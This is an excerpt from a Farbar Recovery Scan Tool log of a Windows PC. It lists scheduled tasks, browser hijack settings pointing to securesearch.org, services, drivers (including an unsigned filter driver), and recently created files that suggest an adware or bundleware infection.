FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08C10116-0F05-4F1B-AF73-06B589373F46} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14679256 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {08E8831B-9A9D-4E04-A6EB-BD404165222C} - System32\Tasks\Antivirus Emergency Update => C:\Program Files\AVG\Antivirus\AvEmUpdate.exe [3858056 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
Task: {0F26C413-9F83-4AF2-812E-BAA9DD4D1CD7} - System32\Tasks\AVGUpdateTaskMachineCore => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {2F09ED43-2A3D-464C-B5E5-B157022CE7EB} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_433_Plugin.exe [1502264 2020-09-08] (Adobe Inc. -> Adobe)
Task: {53EE07E4-1B5A-4925-9B87-CA84FDB1ED99} - System32\Tasks\AVGUpdateTaskMachineUA => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {79E87EF1-4D71-44FC-8873-A72C39CD80FC} - System32\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {7A446EC8-82DB-4A54-945E-27A566D3080B} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [660688 2020-09-02] (Mozilla Corporation -> Mozilla Foundation)
Task: {94BE50EC-EFA1-4E08-9A28-6830D1121378} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2020-03-21] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {95CA5060-B138-497D-90C3-645A155D24D6} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [1792136 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A77F7A79-4A0D-4E72-958D-1F2DA35B6B16} - System32\Tasks\AVG Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A86F3AA5-DE31-43BF-9913-2D9A69740383} - System32\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {BC8897D4-CC61-4362-8CDD-944E4953143E} - System32\Tasks\AVG Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {EA92647F-8039-4B01-9080-AE7111B54CD3} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{3B3152EA-857D-47CF-AB25-91BD1A979357} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{82897F20-ADA3-49EB-B2E4-DAED68663EB8} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 213.46.172.37 213.46.172.36
Tcpip\..\Interfaces\{e8de9f77-ea67-4223-a7f4-f48222bdaf84}: [DhcpNameServer] 213.46.172.37 213.46.172.36

Internet Explorer:
==================
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-29 03:31:11&bName=
SearchScopes: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\ssv.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\jp2ssv.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)

Edge: 
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Milan\AppData\Local\Microsoft\Edge\User Data\Default [2020-09-11]
Edge Extension: (Microsoft Protect) - C:\Users\Milan\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fcppdfelojakeahklfgkjegnpbgndoch [2020-08-29]

FireFox:
========
FF DefaultProfile: omklf3yt.default
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\omklf3yt.default [2020-08-29]
FF NewTab: Mozilla\Firefox\Profiles\omklf3yt.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-29 03:31:11&bName=
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release [2020-09-11]
FF Notifications: Mozilla\Firefox\Profiles\nh2u98jr.default-release -> hxxps://cs70.divokekmeny.cz
FF Extension: (Mozilla Official) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2020-08-29] [not signed]
FF Extension: (Greasemonkey) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-03-18]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\dtplugin\npDeployJava1.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\plugin2\npjp2.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=3 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=9 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @videolan.org/vlc,version=3.0.10 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.11 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)
R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3668944 2020-08-08] (philandro Software GmbH -> philandro Software GmbH)
S2 avg; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [354272 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [7823296 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgm; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
S3 AVGSecureBrowserElevationService; C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\elevation_service.exe [1343656 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe [6986096 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2019-09-19] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [29272 2020-08-29] (LAVASOFT SOFTWARE CANADA INC -> )
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\NisSrv.exe [2169568 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\MsMpEng.exe [128376 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
S3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37208 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [205952 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [235656 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [195720 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61064 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16320 2020-08-29] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [42840 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175264 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgNetHub; C:\WINDOWS\System32\drivers\avgNetHub.sys [515600 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [109336 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [84912 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [851664 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [466816 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [217392 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [323848 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2020-01-09] (Microsoft Corporation) [File not signed]
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [42256 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [59344 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [78216 2020-08-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [430320 2020-08-05] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [98520 2020-08-05] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-11 14:27 - 2020-09-11 14:29 - 000020645 _____ C:\Users\Milan\Desktop\FRST.txt
2020-09-11 14:27 - 2020-09-11 14:28 - 000000000 ____D C:\FRST
2020-09-11 14:27 - 2020-09-11 14:27 - 000000000 _____ C:\Users\Milan\Desktop\Nový textový dokument.txt
2020-09-11 14:24 - 2020-09-11 14:25 - 002297344 _____ (Farbar) C:\Users\Milan\Desktop\FRST64.exe
2020-09-09 07:11 - 2020-09-09 07:11 - 000000000 ____D C:\Users\Milan\AppData\Local\CrashDumps
2020-09-09 07:03 - 2020-09-09 07:03 - 001728079 _____ C:\Users\Milan\Downloads\pz_II_c_87_01.rar
2020-09-06 14:21 - 2020-09-06 15:02 - 733129592 _____ C:\Users\Milan\Downloads\Šifra mistra Leonarda super film cz dabing dvdrip.avi
2020-09-06 12:20 - 2020-09-06 13:13 - 932525132 _____ C:\Users\Milan\Downloads\Apocalipto.avi
2020-09-02 20:01 - 2020-09-02 20:01 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-09-02 15:58 - 2020-09-02 20:04 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-08-30 12:28 - 2020-08-30 14:19 - 1992979015 _____ C:\Users\Milan\Downloads\The.Debt.Collectors.2.2020.PROPER.1080p.WEBRip.x264-RARBG.mp4
2020-08-29 22:45 - 2020-09-10 15:06 - 000002375 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-09-10 15:06 - 000002340 _____ C:\Users\Public\Desktop\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-08-29 22:45 - 000003826 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Hourly)
2020-08-29 22:45 - 2020-08-29 22:45 - 000003242 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Logon)
2020-08-29 22:41 - 2020-08-29 22:41 - 000003468 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineUA
2020-08-29 22:41 - 2020-08-29 22:41 - 000003344 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineCore
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ___HD C:\$AV_AVG
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\AVG
2020-08-29 22:40 - 2020-08-29 22:45 - 000000000 ____D C:\Users\Milan\AppData\Local\Avg
2020-08-29 22:40 - 2020-08-29 22:40 - 000002075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000002063 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Roaming\AVG
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Local\CEF
2020-08-29 22:39 - 2020-09-02 14:57 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-08-29 22:39 - 2020-08-29 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-08-29 22:38 - 2020-08-29 22:39 - 000323848 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000851664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000515600 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetHub.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000466816 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000336520 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-08-29 22:38 - 2020-08-29 22:38 - 000235656 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000217392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000205952 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000195720 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000175264 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000109336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000084912 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000061064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000042840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000037208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000016320 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgElam.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\Common Files\AVG
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\AVG
2020-08-29 22:37 - 2020-09-03 16:57 - 000000000 ____D C:\ProgramData\AVG
2020-08-29 22:37 - 2020-08-29 22:37 - 000271696 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Milan\Downloads\avg_antivirus_free_setup.exe
2020-08-29 18:07 - 2020-08-29 22:38 - 000000000 ____D C:\Users\Milan\AppData\Roaming\3k52z4f5aim
2020-08-29 18:07 - 2020-08-29 22:37 - 000000000 ____D C:\Program Files\M3PY0PHHSX
2020-08-29 17:53 - 2020-08-29 17:53 - 000025368 _____ (FsFilter Network) C:\WINDOWS\0246CDED558E.sys
2020-08-29 17:52 - 2020-09-10 07:43 - 000001039 _____ C:\Users\Milan\Desktop\ScrSnap.lnk
2020-08-29 17:52 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Local\ScrSnap
2020-08-29 17:51 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Roaming\npy4omvvn5m
2020-08-29 17:50 - 2020-08-29 22:44 - 000000000 ____D C:\Users\Milan\AppData\Roaming\0246cded558e
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Local\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2020-08-29 17:30 - 2020-08-29 22:42 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-08-29 17:30 - 2020-08-29 22:41 - 000000000 ___HD C:\WINDOWS\rss
2020-08-29 17:30 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\oudvj15abkf
2020-08-29 17:30 - 2020-08-29 17:30 - 000000000 ____D C:\ProgramData\Lavasoft
2020-08-29 17:29 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\oizjd
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\Program Files (x86)\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:34 - 000000000 ____D C:\Program Files (x86)\Convertilla
2020-08-29 17:29 - 2020-08-29 17:29 - 000000000 ____D C:\Program Files (x86)\DiskFixer
2020-08-27 23:00 - 2020-08-28 00:46 - 1959706735 _____ C:\Users\Milan\Downloads\Zeme.a.krev-Earth.and.Blood.2020.1080p.WEB.x264.DDP5.1.CZ.TITULKY-FCKR.mkv
2020-08-27 10:12 - 2020-08-27 11:16 - 1141266433 _____ C:\Users\Milan\Downloads\Ghosts.Of.War.2020.titl.ve filmu-kirikos1.mp4
2020-08-26 23:01 - 2020-08-29 16:26 - 000000000 ____D C:\Users\Milan\Desktop\Tanky
2020-08-24 09:09 - 2020-08-15 18:12 - 045761304 _____ C:\Users\Milan\Downloads\Maly_Modelarz_2005-04-06_-_Bismarck.rar
2020-08-15 17:41 - 2020-08-15 17:41 - 000000000 ____D C:\Users\Milan\Desktop\OH-13
2020-08-15 17:32 - 2020-08-15 17:32 - 006094091 _____ C:\Users\Milan\Downloads\Hrad Rokštejn.pdf
2020-08-15 08:34 - 2020-08-15 08:34 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-08-15 08:34 - 2020-08-10 10:38 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-08-15 08:34 - 2020-08-10 10:37 - 000905528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-08-15 08:06 - 2020-08-15 08:06 - 002510856 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019852288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019812352 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 018032128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007758848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007270912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 006294528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005904896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005013504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004859904 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004611072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004129408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003822592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003637760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003516416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002950808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-08-12 19:45 - 2020-08-12 19:45 - 002588688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002422384 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002259192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002138280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 001870200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001418832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001012792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
